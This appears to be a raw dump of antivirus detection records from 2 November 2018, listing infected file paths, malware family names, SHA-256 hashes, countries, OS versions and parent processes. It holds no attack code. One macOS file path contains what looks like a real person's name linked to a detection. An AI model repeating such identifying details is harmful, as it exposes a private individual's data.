  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T09:45:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='importerredserver.exe', filepath='C:\\Program Files\\Adobe\\Adobe Encore CS6\\32\\ImporterREDServer.exe', filesize=1252000, name='W32/Sality.AT.#M1.#R1'), hash='52a90b2c40f36b35e499bf3191675d5896757bcc45b2bb963679324d5628231d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160121-f6185ebf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160121-F6185EBF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082916-a68d6a14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-082916-A68D6A14', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183816-10504ead', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8518b6c\\AVSCAN-20181102-183800-0DC3154C\\AVSCAN-20181102-183816-10504EAD', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T22:15:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\D:\\game\\天堂M\\Anubisbot\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153047-c9e0c7e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_80c54e39\\AVSCAN-20181102-151549-22F1BB06\\AVSCAN-20181102-153047-C9E0C7E8', filesize=448000, name='TR/Delf.C.2.#M1.#R1'), hash='52c43e0f2dd5e961d897f6053de480a6521bf26b8daa2b1efaa63a7cf32e63c0', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL1\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='53e41360ad49785d585b41642def8b5e4a6c3bee5cde8f1162d365b1b292d10d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zauzlddkqk.exe', filepath='C:\\Program Files\\Internet Explorer\\8R66I8HFY2Z7N40\\ZAuzLDdKqK.exe', filesize=640000, name='TR/Dropper.Gen.#M300.#R4046'), hash='66fbd02d6b8a876cfa17da6c1444ffa817175a6ab70f5690b1e9fd07d9ba6b2d', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RO1BHR\\\\\\/Dyk2xCNjE.1', country='SC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:54:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gppw.exe', filepath='C:\\MELSEC\\Gppw\\Gppw.exe', filesize=384000, name='HEUR/AGEN.1021917.#M1.#R1'), hash='2cb9d2290e29b021a245e0ed42ffc3bce9ab92bba0900ef1ae2d102bc5de545b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T09:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='3db5aa07261f6da7fd1573deab6b4d6c1fa83df963f36ce98b55183f8dd98860', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170224-64887325', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e17072eb\\AVSCAN-20181102-164500-D1947A3A\\AVSCAN-20181102-170224-64887325', filesize=128000, name='Adware/Elex.0dd3a5.#M1.#R1'), hash='0dd3a5f51f3139edc29338bf545981c0d56a9ff2fbc0c4b65a7d5607b89804b3', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:02:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soldier_frombondfilms.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\soldier_frombondfilms\\soldier_frombondfilms.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='devcon.exe', filepath='C:\\Program Files\\PowerISO\\devcon.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='3a57070a086808cc455ce916a5c542e0ee3ca531ca8a17086984c73b229c2865', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:HwhntRGP80WTZ53X.1', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-02T09:32:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new folder.exe', filepath='\\\\NERA001\\Stock Sim รวม\\New Folder.exe', filesize=1536000, name='TR/Patched.Ren.Gen.#M300.#R3264'), hash='1c4a096765790c142a8d5727b5cfc4191c090afb49dc9a6b9be6bca4ebfddd4a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T04:28:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092003-cc71b511', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed0ae026\\AVSCAN-20181102-091909-C1B80BF8\\AVSCAN-20181102-092003-CC71B511', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0122721.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0122721.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new folder (2).exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\New Folder (2).exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174624-44468b9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2853152\\AVSCAN-20181102-173838-009AC5C4\\AVSCAN-20181102-174624-44468B9A', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='1db53c54ad20a118b65f358848fc7ff3e91db289032d210e7bff3d72f24c178a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:46:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='helppane.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-help-client_31bf3856ad364e35_6.1.7600.16385_none_6beee6458f6a465e\\HelpPane.exe', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='45b6865fe40fdf91f8d426a2bb75b546d05227a8cdb41acbc7b41ae3650b2b71', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161644-43713ff1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_668bca38\\AVSCAN-20181102-161522-3ADA3DDA\\AVSCAN-20181102-161644-43713FF1', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061457-97c7fe9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061457-97C7FE9F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chgport.exe', filepath='d:\\windows\\system32\\chgport.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='6db1f7435a318d675132d4b6c38b51341768f9d9f690ac61691e2b6b7ab04da9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:28:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115925-22d2f346', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-115813-1A715307\\AVSCAN-20181102-115925-22D2F346', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050801-3e051c6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050801-3E051C6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054223-0af856ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054223-0AF856EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055239-7a346019', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055239-7A346019', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061454-960c78ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061454-960C78EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052300-5580108d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052300-5580108D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051557-599292c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051557-599292C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091327-6ccc1392', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a8770ece\\AVSCAN-20181102-091254-68FE6891\\AVSCAN-20181102-091327-6CCC1392', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:13:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050708-1e2ece02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050708-1E2ECE02', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tempsbe.bat', filepath='C:\\Users\\X\\Recorded TV\\TempRec\\TempSBE\\TempSBE.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054245-183fb2fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054245-183FB2FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054645-a6e168c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054645-A6E168C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051551-55f8c4ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051551-55F8C4EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080802-abe71c8a', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-080734-25EFFD85\\AVSCAN-20181102-080802-ABE71C8A', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:07:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tbs.exe', filepath='C:\\Users\\X\\Toshiba\\TBS\\TBS.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:49:46Z'), dt=datetime.date(2018, 11, 2)),
